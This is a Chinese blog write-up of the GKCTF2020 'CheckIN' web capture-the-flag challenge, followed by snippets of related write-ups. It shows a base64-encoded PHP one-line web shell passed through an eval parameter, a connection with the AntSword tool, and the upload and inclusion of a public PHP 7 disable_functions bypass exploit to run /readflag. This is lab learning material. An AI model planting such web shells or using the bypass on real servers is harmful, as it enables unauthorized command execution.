[GKCTF2020]CheckIN -wp

最新推荐文章于 2022-04-09 16:24:15 发布
最新推荐文章于 2022-04-09 16:24:15 发布
阅读量1.2k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/106585042
版权

在这里插入图片描述向Ginkgo传参,后面还有eval函数,先传个phpinfo(); 试试,要传base64编码后的。

在这里插入图片描述发现没有问题,发现一大堆被禁的函数,php版本为7.3。
接下来看看能不能穿一句话上去
eval($_POST[‘ccc’]);
?Ginkgo=ZXZhbCgkX1BPU1RbJ2NjYyddKTs=

然后用蚁剑连接
在这里插入图片描述可以看到flag和readflag;
权限不够无法打开flag,readflag打开也是一堆乱码。
这种情况一般就是通过执行readflag来获取flag。
接下来就要结合7.3版本,readflag,想到
bypass disable_functions,该漏洞可以触发命令执行
大佬给出的exp:
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

在这里插入图片描述修改一下exp的执行目标,通过蚁剑上传至tmp目录下(因为这目录的权限较高)

在这里插入图片描述上传成功后在页面里包含文件即可获得flag,
?Ginkgo=include(’/tmp/test.php’);
?Ginkgo=aW5jbHVkZSgnL3RtcC90ZXN0LnBocCcpOw==

在这里插入图片描述
注:(文章为本人参考他人wp复现,学习思路)

冰可乐不加可乐
关注
【学习笔记 22】 buu [GKCTF2020]CheckIN
weixin_43553654的博客
06-25 618
0x00 知识点 任意文件写入漏洞,部分过滤的绕过 0x01 解题过程 打开一看,代码审计 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $th
GKCTF2020 - Web(CheckIN)
ximo的博客
03-16 308
CheckIN 题目,代码审计: <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&gt
GKCTF2020 checkin
qq_53755216的博客
06-23 355
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
[GKCTF2020]CheckIN
qq_45691294的博客
09-25 393
打开题目,直接得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gink
[GKCTF2020]CheckIN bypass_php7_disable_functions
偷一个月亮
09-01 468
[GKCTF2020]CheckIN <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = ...
GKCTF2021 checkin
pondzhang的专栏
06-27 539
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
checkin-detector:酒店入住 人脸检测
05-16
checkin-detetor 人脸检测 / 人脸识别 / 人脸搜索 / 身份证识别 / 人脸比对 可实现实时拍照与身份证照片进行对比. Get Start $ git clone git@github.com:CNBlackJ/checkin-detector.git && cd checkin-detector $ ...
Checkin-app:主持人的应用程序,用于跟踪正在检查事件的来宾
03-30
Checkin-app 是一款专为主持人设计的应用程序,旨在高效地追踪并管理活动现场的来宾签到情况。它利用PHP编程语言作为后端核心技术,实现了对参会人员签到流程的自动化处理,极大地提高了活动组织的效率。 1. PHP...
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
yiban-auto-checkin-deprecated:SUST晨午检自动打卡
05-28
"yiban-auto-checkin-deprecated:SUST晨午检自动打卡" 是一个针对SUST(可能指的是一所大学,如三峡大学)学生的自动化工具,它主要用于自动完成学校的晨午检打卡任务。这个项目已被标记为“已弃用”,意味着开发者...
[GKCTF2020] web题-CheckIN
BROTHERYY的博客
07-29 630
复现环境:buuoj.cn 代码提示有eval函数可以执行base64加密代码 成功回显了phpinfo信息 编辑一句话上传 eval($_POST[1]); 根目录上有flag和readflag,但都没法访问,应该是权限不够 bypass disable_functions 该漏洞可以执行命令执行 exp链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php 上传到有权限的目录/tmp ?Ginkg
[GKCTF2020]CheckIN 1
feng的博客
11-16 224
知识点 Bypass disable_function WP 这题直接给了个后门,猜测存在一些限制,看了一下phpinfo里的disable_function发现把能命令执行的全给毙了。。。然后蚁剑连上去,发现根目录下存在/flag和/readflag,直接读/flag文件读不了,看来要利用/readflag,但是怎么利用是个姿势盲区,我用蚁剑的bypass插件全给试了,都不行。。 主要自己的问题是没有仔细的观察php的版本。这个php的版本是7.3,php7.0-7.3存在一个漏洞: Use After
GKCTF2021_checkin
z1r0的博客
04-09 444
GKCTF2021_checkin 查看保护 简单题 有一个溢出,只能溢出到rbp所以肯定栈迁移直接打。有一个小坑点就是0x20这个read,最后一个gadget不能选用puts_plt + main_addr,因为0x20不够,所以选择下面这个gadget即可,可以泄露libc又可以继续执行vuln函数 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li =
BUUCTF:[GKCTF2020]CheckIN
qq_46230755的博客
12-16 554
这题还是很有意思的,考的点有 先看一下题目给的代码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
GKCTF 2020 re
qq_37439229的博客
05-25 595
周末打了两场比赛 bjd GK,bjd我打自闭了,赛中只做出了两道题,赛后又才又做出一道。。。不得不说按道理我四道题都看懂了,知道方法怎么做,可是我不会写脚本啊。。。得加强python的编程能力了。。。 来说说GKCTF,(虽然还是只做出了3道题。。。。啥时能做到ak啊!!!!) checkin 密码HelloWorld,之后砖块游戏好了 Chelly’s identity 老二次元了。。。。 方法:动态调试,比较简单 a = [0x2,0x3,0x5,0x7,0xb,0xd,0x11,0x13
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 353
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
[GKCTF2020]cve签到 详细题解
偷一个月亮
09-02 498
http://96c443e2-806a-40a2-85f3-0b94014d4a19.node3.buuoj.cn/?url=http://127.0.0.123%00www.ctfhub.com 知识点
[GKCTF2020]cve版签到
qq_43801002的博客
06-21 946
题目:根据hint可知考察cve-2020-7066,是一个ssrf漏洞 https://www.anquanke.com/vul/id/1966253 漏洞详情 PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_header
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值